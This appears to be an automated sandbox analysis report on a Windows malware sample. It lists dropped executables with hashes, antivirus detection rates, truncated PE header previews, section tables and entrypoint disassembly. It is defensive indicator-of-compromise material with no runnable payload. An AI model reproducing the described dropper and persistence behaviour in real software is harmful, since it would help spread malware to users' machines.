                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\6FB4.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):373760
                                                                                  Entropy (8bit):6.990411328206368
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                  MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                  SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                  SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                  SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\8783.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3576320
                                                                                  Entropy (8bit):7.9976863291960605
                                                                                  Encrypted:true
                                                                                  SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                  MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                  SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                  SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                  SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):301056
                                                                                  Entropy (8bit):5.192330972647351
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                  MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                  SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                  SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                  SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\9DFA.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3576320
                                                                                  Entropy (8bit):7.9976863291960605
                                                                                  Encrypted:true
                                                                                  SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                  MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                  SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                  SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                  SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\B0F7.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):905216
                                                                                  Entropy (8bit):7.399713113456654
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                  MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                  SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                  SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\C7FA.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:MS-DOS executable
                                                                                  Category:dropped
                                                                                  Size (bytes):557664
                                                                                  Entropy (8bit):7.687250283474463
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                  MD5:6ADB5470086099B9169109333FADAB86
                                                                                  SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                  SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                  SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                  C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):322560
                                                                                  Entropy (8bit):6.7095586688781985
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:nOOJ91Tu9Vc1ye3MKfa+zqKnvDfsxa6hkZC15O5Pdz:nRJ91TYWym1ffzvD36YC15E
                                                                                  MD5:6009BCB680BE6C0F656AA157E56423DC
                                                                                  SHA1:FA9BA68D6B2026683BD392259BA26D7D468AEA7E
                                                                                  SHA-256:5C037C7C1338CF54A9D1E81B74BB4AD003E1A254069A03499426EC1600A748D9
                                                                                  SHA-512:5ECE7D9531051C951DFA0CF9533AB778B468EBE3EBE5D7B8A934D408E69BE910F244C59810A5FB41376B1CA7E5EB78DBF514032354EF047D00F043E2A17795E9
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...9.-`..........................................@.........................................................................$...(...................................................................0...@...............D............................text............................... ..`.data...............................@....gave...............................@....noduf..............................@....gafal..............................@....rsrc................ ..............@..@.reloc..dF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):319488
                                                                                  Entropy (8bit):6.68576465213566
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:tFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:tFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:7C64BD730B6C9565F287278834A33618
                                                                                  SHA1:0D36AF541B32F19FD18E7FDA3F55440C97D22407
                                                                                  SHA-256:6CB775A7C9B0CF8BA308029DC623E1DE6D17CB2AB6B7EBBBD9C16BFCAA55EFE8
                                                                                  SHA-512:A8A304220B0CCA1058449511BDE2973E90F9237BE36A909C070AF2C0C9B6D340DB21A0287BCDFA9D333C61FCA1A7D7C95E4CDF4288C8D192FD681ADA4F322C55
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`.........................................@.............................................................................(...................................................................0...@...............D............................text...d........................... ..`.data...............................@....sop................................@....fob................................@....hasajo.............................@....rsrc...............................@..@.reloc..ZF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):537088
                                                                                  Entropy (8bit):5.840438491186833
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                  MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                  SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                  SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                  C:\Users\user\AppData\Local\Temp\gecrjwsv.exe
                                                                                  Process:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11673600
                                                                                  Entropy (8bit):3.816723429746929
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:OFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:OFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:6DD4312F6A305B72C1A1948F27068190
                                                                                  SHA1:1A76D5EB3D9CB7628B746A2C649DC6CCC03EACAC
                                                                                  SHA-256:DD1F717452D1875BF3AF9FDE8D4AC06514FF9B05E58C579E6AD5F2B0A5F4D51F
                                                                                  SHA-512:BC1742225A9FC18856424423C062E7CCA7CA28C0232F23FBF78661898144D92EA9A2EC6FF4EC91BCA50B69C2B33CB2F43E059A6AFAB8B0BFA86517A8BBA914C5
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`.........................................@.............................................................................(...................................................................0...@...............D............................text...d........................... ..`.data...............................@....sop................................@....fob................................@....hasajo.............................@....rsrc...............................@..@.reloc..ZF..........................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):320512
                                                                                  Entropy (8bit):6.691089236822667
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:0H4/g0hr5Y3eofIaxJGgOe8nQGo/GOEEmBbejvf:0Y4OuJI8pd8a/GAmBbe
                                                                                  MD5:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  SHA1:37723B453FD3133C01E7A43892B73C6580EDD164
                                                                                  SHA-256:1CF27AB77A771FF942B1E2947856844FBAB4991CF87ACA618968445B5C5D706D
                                                                                  SHA-512:7007BA06A902089229F384650DE75ABCEC8740501F3E6A12F421951689F932582DD5749234B8B635D074B3BDD1061AC786449DD582BDAF840FBDEF9BF2BB76F2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L....U.`..........................................@.................................P...........................................(...................................................................0...@...............D............................text...D........................... ..`.data...............................@....koyalef............................@....bopi...............................@....cegem..............................@....rsrc...............................@..@.reloc..ZF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Roaming\rifsswe:Zone.Identifier
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                  C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe (copy)
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11673600
                                                                                  Entropy (8bit):3.816723429746929
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:OFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:OFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:6DD4312F6A305B72C1A1948F27068190
                                                                                  SHA1:1A76D5EB3D9CB7628B746A2C649DC6CCC03EACAC
                                                                                  SHA-256:DD1F717452D1875BF3AF9FDE8D4AC06514FF9B05E58C579E6AD5F2B0A5F4D51F
                                                                                  SHA-512:BC1742225A9FC18856424423C062E7CCA7CA28C0232F23FBF78661898144D92EA9A2EC6FF4EC91BCA50B69C2B33CB2F43E059A6AFAB8B0BFA86517A8BBA914C5
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`.........................................@.............................................................................(...................................................................0...@...............D............................text...d........................... ..`.data...............................@....sop................................@....fob................................@....hasajo.............................@....rsrc...............................@..@.reloc..ZF..........................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Windows\appcompat\Programs\Amcache.hve
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1572864
                                                                                  Entropy (8bit):4.236352523388576
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:qCkTwSoKc2tIokbtAz9HlFkEwQVj9jNoD+d+qnG3miIAAQVi:nkTwSoKc2tjkbt23w
                                                                                  MD5:9559FE849D365085D314F82D67F2A35E
                                                                                  SHA1:CC18BA14948462C90BF7D9A82DF399FFDCD009E9
                                                                                  SHA-256:095A6F3AC520C2FCA853EF867B55E04B72221523137DE58C8882C4F38117BA4E
                                                                                  SHA-512:BBDABC4E7D8B64576FCFE31D1438E6A1C854772AE2EB0633C76676D72AB992B1F77C097DCEFEF9FBE4C5D9FB92EBAAF5D576F316A02180FD08E33A4C20794BCD
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.%C= .................................................................................................................................................................................................................................................................................................................................................H`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):3.3460374001719013
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:jjC5K5gBv4KgnVVeeDzeT1NKZtjbT8GxwQ3zeDM8y:P8KUg/eeDzeJNYtj0GxwQiM8
                                                                                  MD5:B70CC5CA4245A261BB82B3C28B555A61
                                                                                  SHA1:935103E48FCA22FF96AED36458371D966DA4594B
                                                                                  SHA-256:FCB60B171A00416847309E79408CA0FC4AB0D093257417FD4C3BAB1BB9EF4D8D
                                                                                  SHA-512:45EBF9B3A9848A4F94F04CF1B055ABDB90A166C286179DB9E394900EED75E7DF19368B83CFE63B0902FA49511706E057859287756D7D735D4CEDD57710A8270E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.%C= .................................................................................................................................................................................................................................................................................................................................................H`HvLE.N......G..............&.......md........................ ..hbin................p.\..,..........nk,...E= .......x........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...E= ....... ........................... .......Z.......................Root........lf......Root....nk ...E= ................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.691089236822667
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:tijXCZsbGe.exe
                                                                                  File size:320512
                                                                                  MD5:888928d26bd03678afd9fed0d92f6fc9
                                                                                  SHA1:37723b453fd3133c01e7a43892b73c6580edd164
                                                                                  SHA256:1cf27ab77a771ff942b1e2947856844fbab4991cf87aca618968445b5c5d706d
                                                                                  SHA512:7007ba06a902089229f384650de75abcec8740501f3e6a12f421951689f932582dd5749234b8b635d074b3bdd1061ac786449dd582bdaf840fbdef9bf2bb76f2
                                                                                  SSDEEP:6144:0H4/g0hr5Y3eofIaxJGgOe8nQGo/GOEEmBbejvf:0Y4OuJI8pd8a/GAmBbe
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R.....g.R..])...R...S...R.......R.......R.......R.Rich..R.................PE..L....U.`...................

                                                                                  File Icon

                                                                                  Icon Hash:c8d0d8e0f8e0f0e8

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x41b7b0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                  Time Stamp:0x60A45518 [Wed May 19 00:00:24 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:80fec6fca6f81033220e34b44810dbfd

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  call 00007FB310BC2FBBh
                                                                                  call 00007FB310BB5FC6h
                                                                                  pop ebp
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push FFFFFFFEh
                                                                                  push 0043DDA8h
                                                                                  push 0041E990h
                                                                                  mov eax, dword ptr fs:[00000000h]
                                                                                  push eax
                                                                                  add esp, FFFFFF94h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, dword ptr [00440354h]
                                                                                  xor dword ptr [ebp-08h], eax
                                                                                  xor eax, ebp
                                                                                  push eax
                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                  mov dword ptr [ebp-18h], esp
                                                                                  mov dword ptr [ebp-70h], 00000000h
                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                  lea eax, dword ptr [ebp-60h]
                                                                                  push eax
                                                                                  call dword ptr [004010A0h]
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  jmp 00007FB310BB5FD8h
                                                                                  mov eax, 00000001h
                                                                                  ret
                                                                                  mov esp, dword ptr [ebp-18h]
                                                                                  mov dword ptr [ebp-78h], 000000FFh
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  mov eax, dword ptr [ebp-78h]
                                                                                  jmp 00007FB310BB6107h
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  call 00007FB310BB6144h
                                                                                  mov dword ptr [ebp-6Ch], eax
                                                                                  push 00000001h
                                                                                  call 00007FB310BC399Ah
                                                                                  add esp, 04h
                                                                                  test eax, eax
                                                                                  jne 00007FB310BB5FBCh
                                                                                  push 0000001Ch
                                                                                  call 00007FB310BB60FCh
                                                                                  add esp, 04h
                                                                                  call 00007FB310BBF0A4h
                                                                                  test eax, eax
                                                                                  jne 00007FB310BB5FBCh
                                                                                  push 00000010h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 build 21022
                                                                                  • [IMP] VS2005 build 50727
                                                                                  • [ASM] VS2008 build 21022
                                                                                  • [LNK] VS2008 build 21022
                                                                                  • [RES] VS2008 build 21022
                                                                                  • [C++] VS2008 build 21022

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3e4d40x28.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x83b8.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1e04.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13900x1c.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91300x40.text
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x344.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x3e8440x3ea00False0.582655002495data6.96511151774IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .data0x400000x10c9880x1800False0.340657552083data3.46253582216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .koyalef0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .bopi0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .cegem0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
